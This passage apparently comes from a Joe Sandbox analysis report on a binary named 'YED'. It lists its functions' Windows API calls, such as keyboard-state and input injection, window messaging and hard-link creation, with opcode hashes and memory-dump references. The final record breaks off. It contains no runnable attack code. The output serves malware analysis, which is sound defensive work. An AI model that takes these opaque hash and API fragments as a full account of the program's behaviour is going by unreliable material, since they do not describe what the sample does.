                                                                                                                                                • Instruction ID: 82c868c62029cbee1c9a2d2cd6be53c813667eef8ab1190bb95d84fcef38075c
                                                                                                                                                • Opcode Fuzzy Hash: 47f9ae7d287150d761063ee206a8a03a7ede1b0f9e360cc5ca9de115cb069995
                                                                                                                                                • Instruction Fuzzy Hash: 07216B7213432266C331AE259C02FB773EC9FA6300F408025FA4D97041EBB49DF1C691
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002A3840
                                                                                                                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002A3850
                                                                                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 002A3876
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$MoveWindow
                                                                                                                                                • String ID: Listbox
                                                                                                                                                • API String ID: 3315199576-2633736733
                                                                                                                                                • Opcode ID: 6b4bbbffdb3558a4dc3a686307bc3be616d8210dc4e40cfe1f55a1b04e739389
                                                                                                                                                • Instruction ID: 7659a4dbb32b46b07bdbc3045b6cf126f9b3c8094844d6ef462c457bfef0a46b
                                                                                                                                                • Opcode Fuzzy Hash: 6b4bbbffdb3558a4dc3a686307bc3be616d8210dc4e40cfe1f55a1b04e739389
                                                                                                                                                • Instruction Fuzzy Hash: 61218072620119BFEB11CF54DC85EAB776EEF8A750F108125F9049B190CA75DC618BA0
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 00284A08
                                                                                                                                                • GetVolumeInformationW.KERNEL32 ref: 00284A5C
                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,002ACC08), ref: 00284AD0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorMode$InformationVolume
                                                                                                                                                • String ID: %lu
                                                                                                                                                • API String ID: 2507767853-685833217
                                                                                                                                                • Opcode ID: 7b5b28dda45e5e8bfde57f514ed7a6be98da5128e16f9d04f2be359cfceacea1
                                                                                                                                                • Instruction ID: 3ad54d0266552ab6d40ff9743c18ed6a2657171ccef52bfc2a485474aa92eee0
                                                                                                                                                • Opcode Fuzzy Hash: 7b5b28dda45e5e8bfde57f514ed7a6be98da5128e16f9d04f2be359cfceacea1
                                                                                                                                                • Instruction Fuzzy Hash: 9C318074A10109AFD710EF54C895EAA7BF8EF09308F1480A5E809DB252DB71EE55CFA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002A424F
                                                                                                                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002A4264
                                                                                                                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002A4271
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend
                                                                                                                                                • String ID: msctls_trackbar32
                                                                                                                                                • API String ID: 3850602802-1010561917
                                                                                                                                                • Opcode ID: fd0740b7aedba998bff9345bbcf08f3f51f6433afae27f8c5a4d59826e41f895
                                                                                                                                                • Instruction ID: 46bc051ea13b107bb519a64701928c71ac00a5db1ad775c7e6827240279035a8
                                                                                                                                                • Opcode Fuzzy Hash: fd0740b7aedba998bff9345bbcf08f3f51f6433afae27f8c5a4d59826e41f895
                                                                                                                                                • Instruction Fuzzy Hash: FF110631250248BFEF20AF28CC46FAB3BACEFD6B54F110125FA55E6090DAB1DC619B50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00216B57: _wcslen.LIBCMT ref: 00216B6A
                                                                                                                                                  • Part of subcall function 00272DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00272DC5
                                                                                                                                                  • Part of subcall function 00272DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00272DD6
                                                                                                                                                  • Part of subcall function 00272DA7: GetCurrentThreadId.KERNEL32(00000000,?,00000000,00000000), ref: 00272DDD
                                                                                                                                                  • Part of subcall function 00272DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00272DE4
                                                                                                                                                • GetFocus.USER32 ref: 00272F78
                                                                                                                                                  • Part of subcall function 00272DEE: GetParent.USER32(00000000), ref: 00272DF9
                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00272FC3
                                                                                                                                                • EnumChildWindows.USER32 ref: 00272FEB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                • String ID: %s%d
                                                                                                                                                • API String ID: 1272988791-1110647743
                                                                                                                                                • Opcode ID: 1a22cf7d803faf30868a17284e6822ceb7fdbd4a0a24add7af91981be54b900f
                                                                                                                                                • Instruction ID: b63fefb4eaee37e224ae9eead9b836a1e91e6d5c1110a83808c52fb11e3246e9
                                                                                                                                                • Opcode Fuzzy Hash: 1a22cf7d803faf30868a17284e6822ceb7fdbd4a0a24add7af91981be54b900f
                                                                                                                                                • Instruction Fuzzy Hash: F211E771610205ABCF10BF709C89EFE37AAAF95314F048075F90D9B152DE705A699F60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Menu$InfoItem$Draw
                                                                                                                                                • String ID: 0
                                                                                                                                                • API String ID: 3227129158-4108050209
                                                                                                                                                • Opcode ID: 5dec18b362082ab0bcc1a3e704417a2f230b618e346db33334f096db7e74d003
                                                                                                                                                • Instruction ID: 98d950dad6f5c16763e7a7cc62d211411870e4d12efa80967deec69067921d8d
                                                                                                                                                • Opcode Fuzzy Hash: 5dec18b362082ab0bcc1a3e704417a2f230b618e346db33334f096db7e74d003
                                                                                                                                                • Instruction Fuzzy Hash: 3A013C31520229EFDB519F51E844BABBBB4BF46360F1080A9F849DA151DF708AA49F61
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 9e9ebdfad0e3bbe74691f994936d83b63adcccdb3366aa3cb83b1c8d91c1cbe7
                                                                                                                                                • Instruction ID: c346d9361c44aae7431958091c8e9b8ebbf2375764a6b81daef0bca946450632
                                                                                                                                                • Opcode Fuzzy Hash: 9e9ebdfad0e3bbe74691f994936d83b63adcccdb3366aa3cb83b1c8d91c1cbe7
                                                                                                                                                • Instruction Fuzzy Hash: 8EC15B75A10206EFDB14CFA4C898AAEB7B5FF48304F208598E909EB251D771ED95CB90
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000003.756895707.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000003.756895707.0000000002AB0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_3_29d0000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
                                                                                                                                                • Instruction ID: 17fa451d17c2124f59361b8464cb366ce4cc7d795cc42b99f6805965de797442
                                                                                                                                                • Opcode Fuzzy Hash: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
                                                                                                                                                • Instruction Fuzzy Hash: 8CC1E574D04249AFCB21DFA8E8C0BADBBB1BF49310F044199E954A73D2CB799941CF69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1998397398-0
                                                                                                                                                • Opcode ID: f2a9287da4df259d686cec468d1d6c3f2a9748d49ae2b9c754957fe539e725ec
                                                                                                                                                • Instruction ID: 4b89d2bc45158e5b1c454cd391ae42b631f63c2ae6242540a7638727a5742c5a
                                                                                                                                                • Opcode Fuzzy Hash: f2a9287da4df259d686cec468d1d6c3f2a9748d49ae2b9c754957fe539e725ec
                                                                                                                                                • Instruction Fuzzy Hash: 93A15B75224201AFCB10DF64C485A6AB7E5FF8C714F048859F98A9B362DB30EE51CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000), ref: 002705F0
                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00270608
                                                                                                                                                • CLSIDFromProgID.OLE32(?,?), ref: 0027062D
                                                                                                                                                • _memcmp.LIBVCRUNTIME ref: 0027064E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 314563124-0
                                                                                                                                                • Opcode ID: 8ef583254b3d1ba2e71ddb292fdf0ebca2df4c3c6249909920649825b04223a1
                                                                                                                                                • Instruction ID: 85ee559146a33c0bcb4a27e1930bc4e3f33e3ef1c18f1f4daa2fea1ba251991d
                                                                                                                                                • Opcode Fuzzy Hash: 8ef583254b3d1ba2e71ddb292fdf0ebca2df4c3c6249909920649825b04223a1
                                                                                                                                                • Instruction Fuzzy Hash: B9814C71A10109EFCB04DF94C984EEEB7B9FF89315F208158E516AB250DB71AE1ACF60
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: dc4aa574e2cd403070821e53a0edfbde332d8a57976dc46767c23fa1f2c154d7
                                                                                                                                                • Instruction ID: 336dc055647334309ed15eeaf3a5e3eb7587a142aaa9ef5400b019168f859928
                                                                                                                                                • Opcode Fuzzy Hash: dc4aa574e2cd403070821e53a0edfbde332d8a57976dc46767c23fa1f2c154d7
                                                                                                                                                • Instruction Fuzzy Hash: 6E418D72A30101ABDB257FFDDC46BBF3AA4EF41371F240226FC18C6192E67488795A65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetWindowRect.USER32(008F51E0,?), ref: 002A62E2
                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 002A6315
                                                                                                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 002A6382
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3880355969-0
                                                                                                                                                • Opcode ID: d635fea5b6cd1179e7a3117fd176e745021aeec6afef3d1d7afc935a4f9c84f9
                                                                                                                                                • Instruction ID: 0ad22df74b0617d6b742db82b5d8cbcbcdd5cd38ea3b809be470e6ecc980543c
                                                                                                                                                • Opcode Fuzzy Hash: d635fea5b6cd1179e7a3117fd176e745021aeec6afef3d1d7afc935a4f9c84f9
                                                                                                                                                • Instruction Fuzzy Hash: 2F514D7091024AEFCF14DF54D888AAE7BB5EF56760F1481A9F8159B290DB30EDA1CB50
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 25efbbd5d3c35ddc7675acc22976b1cdf30247c526ab2500a1ec5401c882b639
                                                                                                                                                • Instruction ID: ad80f99cf28777a9448e7611c0e7ef0876b1ad216a4b96aca3d91033a03df6c4
                                                                                                                                                • Opcode Fuzzy Hash: 25efbbd5d3c35ddc7675acc22976b1cdf30247c526ab2500a1ec5401c882b639
                                                                                                                                                • Instruction Fuzzy Hash: 8E411972A20704BFD72A9F38CC45BAABBE9EF88710F10452AF555DB681D771D9318B80
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00285783
                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 002857A9
                                                                                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002857CE
                                                                                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002857FA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3321077145-0
                                                                                                                                                • Opcode ID: 02fe09cbacb66c406d34676f274cdd93a3be85af0e5d0ec0116631f1a6996528
                                                                                                                                                • Instruction ID: 60f0671ea9b34198dacc14200f5154b16735213f260a2f2387e98795b358aac7
                                                                                                                                                • Opcode Fuzzy Hash: 02fe09cbacb66c406d34676f274cdd93a3be85af0e5d0ec0116631f1a6996528
                                                                                                                                                • Instruction Fuzzy Hash: 45411A39610611DFCB11EF15C444A5EBBF2AF99320B198489EC4AAB362CB30FD91CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0027ABF1
                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0027AC0D
                                                                                                                                                • PostMessageW.USER32 ref: 0027AC74
                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0027ACC6
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 432972143-0
                                                                                                                                                • Opcode ID: 57506df14775ca2e9cc9e0e8bc6d9dfe0e238d5a672fc18c69d35664d78d8dda
                                                                                                                                                • Instruction ID: b6babdd93649e83caeda36b950e372f37cefd22e3a3f54f173075cee44fa2345
                                                                                                                                                • Opcode Fuzzy Hash: 57506df14775ca2e9cc9e0e8bc6d9dfe0e238d5a672fc18c69d35664d78d8dda
                                                                                                                                                • Instruction Fuzzy Hash: 0131F830A2071A7FEF26CF658809BFE7BA5ABC5330F14C21FE489521D1C77589A58752
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_3_2_210000_YED.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1352109105-0
                                                                                                                                                • Opcode ID: 11f46c37c1dcbb5f33ef24b981fdf31ea1d135b7128a542a051315c5e2b72667
                                                                                                                                                • Instruction ID: 6866c70756fa8dce8e3c6f17c877fae46070e8f8015324a467ca03c61fa6d9d8
